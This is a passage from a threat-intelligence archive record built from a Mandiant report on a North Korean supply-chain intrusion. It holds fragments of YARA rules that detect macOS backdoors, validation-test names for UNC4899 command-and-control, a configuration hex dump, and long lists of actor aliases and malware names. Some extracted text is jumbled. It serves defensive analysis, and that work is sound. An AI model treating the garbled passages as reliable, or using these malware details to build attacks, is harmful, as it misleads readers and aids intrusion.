\"\u003cstring\u003ecom.%s.agent\u003c/string\u003e\" ascii\r\n $str9 = \"%sProxy-Authorization: %s\" ascii\r\n $str10 = \"!udp_type\"\r\n $str11 = \"!http=\"\r\n condition:\r\n ((uint32(0) == 0xBEBAFECA) or (uint32(0) == 0xFEEDFACE) or (uint32(0) == 0xFEEDFACF) or (uint32(0) == 0x\r\n}\r\nFE_APT_Backdoor_MacOS_FULLHOUSE_1\r\n{\r\n meta:\r\n author = \"FireEye\"\r\n description = \"Detects instances of FULLHOUSE.\"\r\n platforms = \"OSX\"\r\n malware_family = \"FULLHOUSE\"\r\n strings:\r\nhttps://www.mandiant.com/resources/blog/north-korea-supply-chain\r\nPage 10 of 11\n\n$s1 = /\u003c\\x00%\\x00l?\\x00s\\x00\u003e\\x00\u003c\\x00%\\x00l?\\x00s\\x00\u003e\\x00\u003c\\x00%\\x00l?\\x00s\\x00\u003e/ wide\r\n $sb1 = { E8 [4-32] 83 F8 ?? 0F 87 [4] 48 8D 0D [4] 48 63 04 81 48 01 C8 FF E0 }\r\n condition:\r\n ((uint32(0) == 0xBEBAFECA) or (uint32(0) == 0xFEEDFACE) or (uint32(0) == 0xFEEDFACF) or (uint32(0) == 0xCEFAEDFE))\r\n}\r\nMandiant Security Validation Actions\r\nVID Name\r\nA106-587 Command and Control - UNC4899, DNS Query, Variant #2\r\nA106-588 Command and Control - UNC4899, DNS Query, Variant #1\r\nA106-589 Command and Control - UNC4899, STRATOFEAR, DNS Query, Variant #1\r\nA106-590 Command and Control - UNC4899, TIEDYE, DNS Query, Variant #1\r\nA106-591 Command and Control - UNC4899, TIEDYE, DNS Query, Variant #2\r\nA106-592 Command and Control - UNC4899, STRATOFEAR, DNS Query, Variant #2\r\nA106-593 Malicious File Transfer - UNC4899, TIEDYE, Download, Variant #1\r\nA106-594 Malicious File Transfer - UNC4899, STRATOFEAR, Download, Variant #1\r\nPosted in\r\nThreat Intelligence\r\nSource: https://www.mandiant.com/resources/blog/north-korea-supply-chain\r\nhttps://www.mandiant.com/resources/blog/north-korea-supply-chain\r\nPage 11 of 11\n\ninclude retrieving and A portion of TIEDYE’s executing additional raw configuration payloads, collecting basic is shown as follows: system information, and executing shell commands.\n00000000 00 00 01 E3 00 0E 00 1E 00 00 00 04 00 03 00 20 ...ã...........\n00000010 00 10 56 E6 00 00 00 04 00 03 00 21 00 00 00 05 ..Væ.......!....\n Page 5 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia", "ETDA" ], "references": [ "https://www.mandiant.com/resources/blog/north-korea-supply-chain" ], "report_names": [ "north-korea-supply-chain" ], "threat_actors": [ { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "c306e698-3b48-46d7-b571-3dfa0c828379", "created_at": "2023-05-16T02:02:09.957677Z", "updated_at": "2026-04-10T02:00:03.364345Z", "deleted_at": null, "main_name": "APT43", "aliases": [], "source_name": "MISPGALAXY:APT43", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "544ecd2c-82c9-417c-9d98-d1ae395df964", "created_at": "2025-10-29T02:00:52.035025Z", "updated_at": "2026-04-10T02:00:05.408558Z", "deleted_at": null, "main_name": "AppleJeus", "aliases": [ "AppleJeus", "Gleaming Pisces", "Citrine Sleet", "UNC1720", "UNC4736" ], "source_name": "MITRE:AppleJeus", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "0106b19a-ac99-4bc9-90b9-4647bfc5f3ce", "created_at": "2023-11-08T02:00:07.144995Z", "updated_at": "2026-04-10T02:00:03.425891Z", "deleted_at": null, "main_name": "TraderTraitor", "aliases": [ "Pukchong", "Jade Sleet", "UNC4899" ], "source_name": "MISPGALAXY:TraderTraitor", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "7a2dd0e8-beea-415c-b90d-4df9da8358ae", "created_at": "2024-09-20T02:00:04.575485Z", "updated_at": "2026-04-10T02:00:03.695726Z", "deleted_at": null, "main_name": "UNC2970", "aliases": [], "source_name": "MISPGALAXY:UNC2970", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434345, "ts_updated_at": 1775792299, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/25d1e0f161e755fb43a986a32487aaeaf06aa589.pdf", "text": "https://archive.orkl.eu/25d1e0f161e755fb43a986a32487aaeaf06aa589.txt", "img": "https://archive.orkl.eu/25d1e0f161e755fb43a986a32487aaeaf06aa589.jpg" } }